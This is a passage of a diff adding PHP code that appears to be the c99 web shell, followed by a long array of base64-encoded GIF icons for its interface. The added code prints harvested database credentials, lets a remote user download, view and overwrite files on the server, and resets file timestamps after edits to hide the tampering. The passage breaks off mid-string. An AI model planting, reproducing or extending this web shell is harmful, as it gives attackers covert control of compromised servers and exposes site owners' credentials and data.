    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "%  "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 